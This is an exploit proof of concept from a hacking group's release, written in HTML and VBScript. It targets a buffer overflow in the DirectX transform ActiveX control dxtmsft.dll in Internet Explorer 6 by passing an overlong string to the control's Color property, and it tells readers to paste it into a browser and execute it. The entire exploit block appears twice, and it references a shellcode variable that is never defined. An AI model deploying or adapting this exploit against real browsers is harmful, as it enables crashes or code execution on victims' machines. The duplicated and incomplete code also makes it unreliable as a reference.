This a Poc Html code,Just copy it to the browser and execute it:
<!--============================================================================
dxtmsft.dll Remote Buffer Overflow Exploit
Internet Explorer ver 6.0
DeltahackingSecurityTEAM
Bug discovered by Dr.Pantagon
Affected Software: dxtmsft.dll (DirectX Media -- Image DirectX Transforms)
DLL VER : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
Company Dll : Microsoft? Windows? Operating System
path : C:\WINDOWS\system32\dxtmsft.dll
all software that use this ocx are vulnerable to this exploits.
www.Deltahacking.net
www.Deltasecurity.ir
==============================================================================-->
<object classid="clsid:421516C1-3CF8-11D2-952A-00C04FA34F05" id="Chroma"></object>
<input language=VBScript onclick=jojo() type=button value="Click here to start Exploit"><script language='vbscript'>
Sub jojo
buff = String(999999, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaA")
get_EDX = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbcccccccccccccddddddddddeee"
buff1 = String(999999, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBbb")
egg = buff + get_EDX + buff1 + scode
Chroma.Color = egg
End Sub
</script>
<!--============================================================================
dxtmsft.dll Remote Buffer Overflow Exploit
Internet Explorer ver 6.0
DeltahackingSecurityTEAM
Bug discovered by Dr.Pantagon
Affected Software: dxtmsft.dll (DirectX Media -- Image DirectX Transforms)
DLL VER : 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)
Company Dll : Microsoft? Windows? Operating System
path : C:\WINDOWS\system32\dxtmsft.dll
all software that use this ocx are vulnerable to this exploits.
www.Deltahacking.net
www.Deltasecurity.ir
==============================================================================-->
<object classid="clsid:421516C1-3CF8-11D2-952A-00C04FA34F05" id="Chroma"></object>
<input language=VBScript onclick=jojo() type=button value="Click here to start Exploit"><script language='vbscript'>
Sub jojo
buff = String(999999, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaA")
get_EDX = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbcccccccccccccddddddddddeee"
buff1 = String(999999, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBbb")
egg = buff + get_EDX + buff1 + scode
Chroma.Color = egg
End Sub
</script>